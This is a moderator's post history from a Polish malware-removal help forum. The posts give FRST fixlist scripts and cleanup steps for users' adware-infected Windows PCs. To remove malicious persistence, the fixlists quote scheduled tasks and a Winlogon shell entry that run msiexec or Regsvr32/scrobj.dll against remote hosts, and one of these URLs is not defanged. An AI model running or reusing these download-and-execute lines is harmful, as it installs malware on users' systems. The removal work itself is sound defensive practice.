Skocz do zawartości

Miszel03

Moderatorzy
  • Postów

    2 329
  • Dołączył

  • Ostatnia wizyta

Treść opublikowana przez Miszel03

  1. ​Całe szczęście, że nie mogłeś go użyć. Autor tego bloga nie wie co zaleca - KLIK. Raport niekompletne. Gdzie log z MBAM i AdwCleaner? Nie mam już ochoty się o to dopraszać, więc jadę od nowa ze skanami. Meritum: widać sporo szczątek po infekcjach adware. Podejrzewam uszkodzenie Zmiennej środowiskowej Path - widoczne są ścieżki relatywne. Na razie poszerzam diagnostykę, nie wdrążam rekonstrukcji. 1. Sugeruję pobrać inny klient torrent (np. qBittorent), gdyż w systemie widać reklamotwórczy uTorrent, ten wg mnie nadaje się do deinstalacji. 2. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: HKLM\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1 HKLM\...\Policies\Explorer: [NoResolveSearch] 1 HKLM\...\Policies\Explorer: [LinkResolveIgnoreLinkInfo] 1 HKLM\...\Policies\Explorer: [NoInternetOpenWith] 1 HKU\S-1-5-21-1280168119-2054726452-3514120849-1001\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1 HKU\S-1-5-21-1280168119-2054726452-3514120849-1001\...\Policies\Explorer: [NoResolveSearch] 1 HKU\S-1-5-21-1280168119-2054726452-3514120849-1001\...\Policies\Explorer: [LinkResolveIgnoreLinkInfo] 1 ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku GroupPolicy: Ograniczenia GroupPolicy\User: Ograniczenia GroupPolicyScripts: Ograniczenia HKU\S-1-5-21-1280168119-2054726452-3514120849-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page = SearchScopes: HKU\S-1-5-21-1280168119-2054726452-3514120849-1001 -> DefaultScope {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL = S2 Bonjour Service; Brak ImagePath S2 Origin Web Helper Service; Brak ImagePath S3 Sense; "%ProgramFiles%\Windows Defender Advanced Threat Protection\MsSense.exe" [X] S2 SkypeUpdate; Brak ImagePath U3 uxldipod; C:\Users\007marc\AppData\Local\Temp\uxldipod.sys [56584 2017-05-23] (GMER) [brak podpisu cyfrowego] U3 aswbdisk; Brak ImagePath U4 DiagTrack; Brak ImagePath U4 TimeBroker; Brak ImagePath Task: {A15E2711-C513-4908-B7D5-948AEBC71353} - System32\Tasks\Microsoft\Windows\DeviceSettings\Phisokanadaing => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=SamsungXSSDX850XEVOX1TB_S2RFNX0H605538A&d=20170512 /q HKU\S-1-5-21-1280168119-2054726452-3514120849-1001\...\StartupApproved\Run: => "GoogleChromeAutoLaunch_A27FE493B52116EED8A5019763B2C6B9" HKU\S-1-5-21-1280168119-2054726452-3514120849-1001\...\StartupApproved\Run: => "3O5H6RIBDJDQQYO" HKU\S-1-5-21-1280168119-2054726452-3514120849-1001\...\StartupApproved\Run: => "D7HWVT7HVLJZMMT" C:\Users\007marc\AppData\Roaming\Songbird2 C:\Users\007marc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Minecraft\Minecraft Debugger.lnk C:\Users\007marc\Desktop\BD-RE.lnk C:\Users\007marc\Desktop\Ghost Files.lnk C:\Users\007marc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Minecraft\Minecraft.lnk C:\Users\007marc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Minecraft\Uninstall.lnk C:\Users\007marc\AppData\Roaming\Microsoft\Windows\Start Menu\Minecraft\Minecraft.lnk C:\Users\007marc\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\= INNE =\Skype.lnk C:\Program Files (x86)\Google C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome C:\Users\User\AppData\Local\Google ] DeleteKey: HKCU\Software\Google DeleteKey: HKLM\SOFTWARE\Google DeleteKey: HKLM\SOFTWARE\Wow6432Node\Google CMD: set CMD: dir /a "C:\Program Files" CMD: dir /a "C:\Program Files (x86)" CMD: dir /a "C:\Program Files\Common Files\System" CMD: dir /a "C:\Program Files (x86)\Common Files\System" CMD: dir /a C:\ProgramData CMD: dir /a C:\Users\Paweł\AppData\Local CMD: dir /a C:\Users\Paweł\AppData\LocalLow CMD: dir /a C:\Users\Paweł\AppData\Roaming Hosts: EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść i zabezpiecz przeglądarkę Mozilla FireFox: Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. Menu Historia > Wyczyść historię przeglądania. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. 4. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). songbird2 Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 5. Pobierz AdwCleaner uruchom go i kliknij Skanuj, kiedy skanowanie zakończy się wydobądź z niego raport, znajduję się on w folderze C:\AdwCleaner. Raport zaprezentuj na forum. 6. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.
  2. Samo nic się nie robi, skoro przeczytałeś lekturę to chyba dobrze o tym wiesz. Log Addition jest zniekształcony, proszę wygeneruj nowy.
  3. W systemie widać nieciekawe instalacje, po za tym jakieś stare igraszki na powłoce startowej (MBAM chyba nie usunął dobrze tego robaka). Jeśli zaś chodzi o problem z aktualizacjami, stronami to wygląda na to, że łańcuch sieciowy został uszkodzony i wdrążam jego rekonstrukcje. 1. Wyczyść punkty przywracania systemu - KLIK. 2. Przez panel sterowania odinstaluj: Wrapper adware / PUP: Internet Explorer 8 Packages. Sugeruję również pobrać inny klient torrent (np. qBittorent), gdyż w systemie widać reklamotwórczy uTorrent, ten wg mnie nadaje się do deinstalacji. 3. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-1935655697-329068152-1417001333-1004\...\Winlogon: [shell] C:\WINDOWS\Explorer.exe [1035264 2008-04-15] (Microsoft Corporation) S3 filtertdidriver; system32\drivers\ewfiltertdidriver.sys [X] S3 hwdatacard; system32\DRIVERS\ewusbmdm.sys [X] S3 hwusbdev; system32\DRIVERS\ewusbdev.sys [X] S4 IntelIde; Brak ImagePath C:\Documents and Settings\All Users\Pulpit\Adobe Reader XI.lnk C:\Documents and Settings\All Users\Pulpit\OpenFM.lnk C:\Documents and Settings\All Users\Menu Start\Programy\Liceum klasa 2\Matematyka podstawowa.lnk C:\Documents and Settings\PC\Pulpit\TomTom MyDrive Connect.lnk C:\Documents and Settings\PC\Menu Start\Programy\TomTom\Odinstaluj TomTom MyDrive Connect.lnk C:\Documents and Settings\PC\Menu Start\Programy\TomTom\TomTom MyDrive Connect.lnk CMD: netsh winsock reset EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 4. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.
  4. Minęło 6 dni...te raporty mogą być nieaktualne. Proszę o nowe, wygenerowane najnowszą wersją FRST. Przepraszam za opóźnienia.
  5. Dwie fałszywki: pod Google Chrome i pod Mozilla FireFox. Po za tym widać również wpisy startowe w Harmonogramie zadań uruchamiające różne strony. Masa usług i wpisów adware. Przeglądarka Mozilla FireFox woła o pomstę do nieba. Za pomoc oczekuję, że przeczytasz lekturę na temat zabezpieczenia się pod takimi sytuacjami: Portale z oprogramowaniem / Instalatory - na co uważać. 1. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-140913146-4283183929-3759989110-1000\...\ChromeHTML: -> C:\Program Files (x86)\Footjane\Application\chrome.exe (Google Inc.) RemoveDirectory: C:\Program Files (x86)\Footjane RemoveDirectory: C:\Users\Oli\AppData\Local\Footjane RemoveDirectory: C:\Users\Oli\AppData\Roaming\Footjane Task: {BA878794-B41C-47F6-A09A-F53A4B842565} - System32\Tasks\Voqeysocis Schedule => C:\Program Files (x86)\Werkas\pihadom.exe Task: {E1B18D9A-CE9A-4FF9-A12C-0DE6209CFF5B} - System32\Tasks\Microsoft\Windows\DeviceSettings\Reogent => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=WDCXWD2500BEKT-75A25T0_WD-WXQ1A80R9996R9996&d=20170510 /q Task: {E818543E-DC05-4EBF-9B13-6AC5CEFD1A6F} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-05-18] () RemoveDirectory: C:\Program Files (x86)\Werkas RemoveDirectory: C:\Program Files (x86)\MIO C:\Users\ThinkPad\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\Users\Public\Desktop\Google Chrome.lnk FirewallRules: [{AC0D3C9C-52FD-43D8-B252-4C1C2ED2FD47}] => (Allow) C:\Program Files (x86)\Footjane\Application\chrome.exe FirewallRules: [TCP Query User{8D36DB04-EE8F-4931-868A-1DCE319AE25D}C:\users\thinkpad\appdata\local\hola\firefox\app\hola_plugin.exe] => (Block) C:\users\thinkpad\appdata\local\hola\firefox\app\hola_plugin.exe FirewallRules: [uDP Query User{E71CB1E7-6B13-4A28-9745-0DBF238B1716}C:\users\thinkpad\appdata\local\hola\firefox\app\hola_plugin.exe] => (Block) C:\users\thinkpad\appdata\local\hola\firefox\app\hola_plugin.exe FirewallRules: [{1B4F49D9-8FFB-457B-BCEA-FD7F729DBB71}] => (Allow) C:\Program Files (x86)\MIO\loader\wdcxwd2500bekt-75a25t0_wd-wxq1a80r9996r9996.dat FirewallRules: [{984613D8-4B99-469A-9A9F-778CE2FAE2C4}] => (Allow) C:\Program Files (x86)\MIO\loader\wdcxwd2500bekt-75a25t0_wd-wxq1a80r9996r9996.dat FirewallRules: [{598155CE-D4A6-44FF-B0BB-B6884462442E}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe FirewallRules: [{44D4CAF7-DB39-4716-9636-D1D9379B9EDB}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe RemoveDirectory: C:\Program Files (x86)\Firefox RemoveDirectory: C:\Users\ThinkPad\AppData\Local\Firefox RemoveDirectory: C:\Users\ThinkPad\AppData\Roaming\Firefox HKLM\...\Providers\i7w852aa: C:\Program Files (x86)\Voqeysocis Schedule\local64spl.dll [311808 2017-05-10] () IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe ShellExecuteHooks: Brak nazwy - {0A347CC0-316E-11E7-8DD3-64006A5CFC23} - C:\Users\ThinkPad\AppData\Roaming\Grohation\Sopishroqpy.dll -> Brak pliku ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku C:\Program Files (x86)\Voqeysocis Schedule C:\Users\ThinkPad\AppData\Roaming\Grohation R2 BIT; C:\ProgramData\BIT\BIT.dll [1857536 2017-05-15] (BIT) [brak podpisu cyfrowego] S2 CSHMDR; C:\Users\ThinkPad\AppData\Local\CSHMDR\Snare.dll [832000 2017-05-18] (IntertSect Alliance Pty Ltd) [brak podpisu cyfrowego] R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [98456 2017-05-19] () R2 WinSAPSvc; C:\Users\ThinkPad\AppData\Roaming\WinSAPSvc\WinSAP.dll [1873920 2017-05-18] (TODO: ) [brak podpisu cyfrowego] U3 uxlyrkog; \??\C:\Users\ThinkPad\AppData\Local\Temp\uxlyrkog.sys [X] C:\ProgramData\BIT C:\Users\ThinkPad\AppData\Local\CSHMDR C:\Users\ThinkPad\AppData\Roaming\WinSAPSvc C:\Users\Public\Desktop\Mozilla Firefox.lnk C:\Users\ThinkPad\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk C:\Users\ThinkPad\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Mozilla Firefox.lnk EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Wyczyść i zabezpiecz przeglądarkę Mozilla FireFox: Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. Menu Historia > Wyczyść historię przeglądania. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. 3. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). footjane;firefox Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 4. Pobierz AdwCleaner uruchom go i kliknij Skanuj, kiedy skanowanie zakończy się wydobądź z niego raport, znajduję się on w folderze C:\AdwCleaner. Raport zaprezentuj na forum. 5. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.
  6. KOMPUTER 1 Dwie fałszywki: pod Google Chrome i pod Mozilla FireFox. Po za tym widać również wpisy startowe na powłoce i w Harmonogramie zadań uruchamiające różne strony. Za pomoc oczekuję, że przeczytasz lekturę na temat zabezpieczenia się pod takimi sytuacjami: Portale z oprogramowaniem / Instalatory - na co uważać. Treść lektury zweryfikuję w przyszłości sprawdzając czy ktoś z takim adresem IP / nickiem założył kolejny temat z pomocą 1. Przez panel sterowania odinstaluj: Programy typu PUP / adware: Browser-Security. Fałszywe oprogramowanie: YAC(Yet Another Cleaner!). 2. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-2083115291-1334581206-888238541-1001\...\ChromeHTML: -> C:\Program Files (x86)\Bagsarah\Application\chrome.exe (Google Inc.) RemoveDirectory: C:\Program Files (x86)\Bagsarah RemoveDirectory: C:\Users\Oli\AppData\Local\Bagsarah RemoveDirectory: C:\Users\Oli\AppData\Roaming\Bagsarah Task: {1931568F-04AF-4C2B-ADF1-BD0144CBC2B8} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj8cFjzLOTVWOUZXMjHxMYUcNWM8NjH5MWk8NdRXRUQWOF== scrobj.dll Task: {FC8FD99D-AA57-480D-9B6C-65A9DDA1F0C1} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj8cFjzLOTVWOUZXMjHxMYUcNWM8NjH5MWk8NdRXRUQWOF== scrobj.dll C:\Users\Oli\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\Users\Public\Desktop\Google Chrome.lnk FirewallRules: [{4BDE3553-DFE9-4C43-BF35-695B79DE0740}] => (Allow) C:\Program Files (x86)\Bagsarah\Application\chrome.exe FirewallRules: [{BF4DAAAD-3B1F-47FE-9568-55FE1FF1A158}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe FirewallRules: [{6EBED432-3F9F-42B1-99AE-71CE5A061BEC}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe RemoveDirectory: C:\Program Files (x86)\Firefox RemoveDirectory: C:\Users\Oli\AppData\Local\Firefox RemoveDirectory: C:\Users\Oli\AppData\Roaming\Firefox HKU\S-1-5-21-2083115291-1334581206-888238541-1001\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj8cFjzLOTVWOUZXMjHxMYUcNWM8NjH5MWk8NdRXRUQWOF== /q IFEO\DisplaySwitch.exe: [Debugger] IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe IFEO\taskmgr.exe: [Debugger] S2 OneDirveSrv; C:\ProgramData\Microsoft OneDrive\setup\SyncTool.dll [X] 2017-05-11 19:25 - 2017-05-11 19:25 - 00000000 _____ C:\WINDOWS\SysWOW64\33 2017-05-11 19:17 - 2017-05-11 19:17 - 00000000 _____ C:\WINDOWS\SysWOW64\3333333 2017-05-11 19:16 - 2017-05-11 19:16 - 00000000 _____ C:\WINDOWS\SysWOW64\1111 2017-05-11 19:15 - 2017-05-11 19:15 - 00000000 _____ C:\WINDOWS\SysWOW64\1111111 2017-05-11 19:16 - 2017-05-11 19:16 - 00000000 _____ C:\WINDOWS\SysWOW64\1111 2017-05-11 19:15 - 2017-05-11 19:15 - 00000000 _____ C:\WINDOWS\SysWOW64\11 2017-05-11 19:15 - 2017-05-11 19:15 - 00000000 _____ C:\WINDOWS\SysWOW64\00 C:\Users\Oli\Desktop\BigFarm.lnk C:\Users\Oli\Desktop\big_bang_empire.lnk C:\Users\Oli\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\BigFarm.lnk C:\Users\Oli\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\big_bang_empire.lnk C:\Users\Oli\AppData\Local\Microsoft\Windows\ConnectedSearch\History\set_1750160028_en-us.lnk C:\Users\Oli\AppData\Local\Microsoft\Windows\ConnectedSearch\History\set_3458257333_en-us.lnk C:\Users\Oli\AppData\Local\Microsoft\Windows\ConnectedSearch\History\set_425821061_en-us.lnk C:\Users\Oli\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Calendar.lnk C:\Users\Oli\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Mail.lnk C:\Users\Oli\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.People.lnk C:\Users\Oli\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk C:\Users\Public\Desktop\Mozilla Firefox.lnk C:\Users\Oli\AppData\Local\Microsoft\Windows\ConnectedSearch\History\txt_1377507374_en-US.lnk C:\Users\Oli\AppData\Local\Microsoft\Windows\ConnectedSearch\History\txt_2104518279_en-US.lnk C:\Users\Oli\AppData\Local\Microsoft\Windows\ConnectedSearch\History\txt_2525402577_en-US.lnk EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść i zabezpiecz przeglądarkę Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. Ustaw tą przeglądarkę jako domyślną, aby cofnąć modyfikację infekcji. 4. Wyczyść i zabezpiecz przeglądarkę Mozilla FireFox: Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. Menu Historia > Wyczyść historię przeglądania. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. 5. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). bagsarah;firefox Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 6. Pobierz AdwCleaner uruchom go i kliknij Skanuj, kiedy skanowanie zakończy się wydobądź z niego raport, znajduję się on w folderze C:\AdwCleaner. Raport zaprezentuj na forum. 7. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt. KOMPUTER 2 Brak oznak infekcji. 1. Odinstaluj: SecurityCenter (masz przecież rozwiązanie ESET). 2. Całościowo przeskanuj system za pomocą programu Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport.
  7. Brakuje raportu Shortcut generowanego przez FRST- uzupełnij.
  8. Zagrożenia z MBAM daj do kasacj - nic zbytnio alarmującego to to nie jest. Temat przenoszę do działu Hardware - pewni w nim leży problem. Przeczytaj uważnie co napisał Rucek. Ja jako Moderator również zwracam uwagę na nick i nie wykonywanie poleceń.
  9. Spróbuj zostawić tą aktualizację na noc. Jeśli nadal będzie problem to nie widzę innego (równie szybkiego i skutecznego) rozwiązania niż kompleksowa deinstalacja Comodo (z użyciem dedykowanego czyściciela).
  10. Popełniłem literówkę przez przypadek w instrukcji do przeszukiwania rejestru (zamiast słowa zoohair dałem zoohari). Powtórz punkt 6, tylko tym razem wklej taki skrypt: zoohair;boxbob;firefox. Chyba stawiałbym na darmowe rozwiązanie Avast. W testach wypada dobrze, a patrząc po tym co widzę na forum to też się nieźle sprawuje. Ewentualnie Avira, ale jak na nią się zdecydujesz to uważnie instaluj. Czyli: chcesz tylko antywirusa, bez toolbarów itp. rzeczy.
  11. Proszę o nowy zestaw raportów i przepraszam za opróżniania.
  12. Proszę mi dać jeszcze trochę czasu - naprawdę nie mam go zbyt wiele.
  13. W raportach brak oznak infekcji, a kosmetykę pomijam, bo po pierwsze jest malutka i nie istotna, a po drugie nie wiem czy to nie pogorszy problemu z komputerem. To dziesięcioletni sprzęt i niestety tutaj raczej nic innego niż Hardware zawinić nie mogło. Widzę, że był używany DLL-Fixer, a to wątpliwy twór integrujący w pliki systemowe. W takim razie proszę o pełny skan za pomocą Mlawarebytes AntiMalware, który jest u Ciebie zainstalowany (= robisz tylko kompleks aktualizacji). Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport.
  14. W gwoli ścisłości: strona główna = strona domowa Google. Nie dobreprogrmy, ani żadne inne nie dokończę, bo jeszcze do sądu mnie podadzą -. System jest zainfekowany przez adware i to tyle co powiem. Bo jak miałbym opisywać każdy przypadek osobno to bym trafił na noszach do wariatkowa i powtarzał bym w kolo to samo. 1. Sugeruję pobrać inny klient torrent (np. qBittorent), gdyż w systemie widać reklamotwórczy uTorrent, ten wg mnie nadaje się do deinstalacji. 2. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-34139168-802105453-4214481315-1000\...\Policies\system: [LogonHoursAction] 2 HKU\S-1-5-21-34139168-802105453-4214481315-1000\...\Policies\system: [DontDisplayLogonHoursWarnings] 1 ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ShortcutTarget: Torpedo.lnk -> E:\Pobrane\Filmy\Torpedo\Torpedo.exe (Brak pliku) GroupPolicy: Ograniczenia - Chrome GroupPolicy\User: Ograniczenia ? GroupPolicyUsers\S-1-5-21-34139168-802105453-4214481315-1003\User: Ograniczenia CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia SearchScopes: HKLM -> DefaultScope - brak wartości SearchScopes: HKU\S-1-5-21-34139168-802105453-4214481315-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = FF Extension: (Brak nazwy) - C:\Users\PietruU\AppData\Roaming\Mozilla\Firefox\Profiles\an6l5ncm.default-1438113267081\extensions\default_newtabff@gmail.com [nie znaleziono] FF Extension: (Brak nazwy) - C:\Users\PietruU\AppData\Roaming\Mozilla\Firefox\Profiles\an6l5ncm.default-1438113267081\extensions\yahooprotected@gmail.com [nie znaleziono] CHR StartupUrls: Default -> "hxxps://www.google.pl/","hxxp://www.delta-homes.com/?type=hp&ts=1430994247&from=wpm05073&uid=WDCXWD10EZEX-00BN5A0_WD-WMC3F0DCVL9ACVL9A","hxxp://www.delta-homes.com/?type=hp&ts=1432127540&z=336b0f84efac891caec2736g9z1c2o7g9o4mawcz1o&from=wpm05203&uid=WDCXWD10EZEX-00BN5A0_WD-WMC3F0DCVL9ACVL9A","hxxp://www.delta-homes.com/?type=hp&ts=1437041109&z=21e223b3f0c97db3c281da1g7zccaefozzjcktmlma&from=wpm07163&uid=WDCXWD10EZEX-00BN5A0_WD-WMC3F0DCVL9ACVL9A","hxxp://www.google.com/" CHR DefaultSearchURL: Default -> hxxp://www.bing.com/search?FORM=__PARAM__DF&PC=__PARAM__&q={searchTerms} CHR DefaultSuggestURL: Default -> hxxp://www.bing.com/osjson.aspx?FORM=__PARAM__DF&PC=__PARAM__&query={searchTerms} S3 MBAMSwissArmy; \??\C:\Windows\system32\drivers\MBAMSwissArmy.sys [X] S4 nvvad_WaveExtensible; system32\drivers\nvvad32v.sys [X] S3 TEAM; system32\DRIVERS\RtTeam60.sys [X] Task: {A598D09B-A59F-4FE4-B075-E17E7C2E27E6} - System32\Tasks\LXTRRLNZ => C:\Users\PietruU\AppData\Roaming\LXTRRLNZ.exe Task: C:\Windows\Tasks\LXTRRLNZ.job => C:\Users\PietruU\AppData\Roaming\LXTRRLNZ.exe C:\Users\PietruU\AppData\Roaming\LXTRRLNZ.exe AlternateDataStreams: C:\ProgramData\TEMP:56E2E879 [118] ShortcutWithArgument: C:\Users\PietruU\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.omniboxes.com/?type=sc&ts=1448352068&z=7bed1dcc3e27fba82421ed9g3z7z6b8c2w1o4e0qet&from=ient07031&uid=WDCXWD10EZEX-00BN5A0_WD-WMC3F0DCVL9ACVL9A ShortcutWithArgument: C:\Users\PietruU\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Sparta\Sparta.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.omniboxes.com/?type=sc&ts=1448352068&z=7bed1dcc3e27fba82421ed9g3z7z6b8c2w1o4e0qet&from=ient07031&uid=WDCXWD10EZEX-00BN5A0_WD-WMC3F0DCVL9ACVL9A ShortcutWithArgument: C:\Users\PietruU\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.omniboxes.com/?type=sc&ts=1448352068&z=7bed1dcc3e27fba82421ed9g3z7z6b8c2w1o4e0qet&from=ient07031&uid=WDCXWD10EZEX-00BN5A0_WD-WMC3F0DCVL9ACVL9A ShortcutWithArgument: C:\Users\PietruU\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.omniboxes.com/?type=sc&ts=1448352068&z=7bed1dcc3e27fba82421ed9g3z7z6b8c2w1o4e0qet&from=ient07031&uid=WDCXWD10EZEX-00BN5A0_WD-WMC3F0DCVL9ACVL9A ShortcutWithArgument: C:\Users\PietruU\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Sparta.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.omniboxes.com/?type=sc&ts=1448352068&z=7bed1dcc3e27fba82421ed9g3z7z6b8c2w1o4e0qet&from=ient07031&uid=WDCXWD10EZEX-00BN5A0_WD-WMC3F0DCVL9ACVL9A EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix 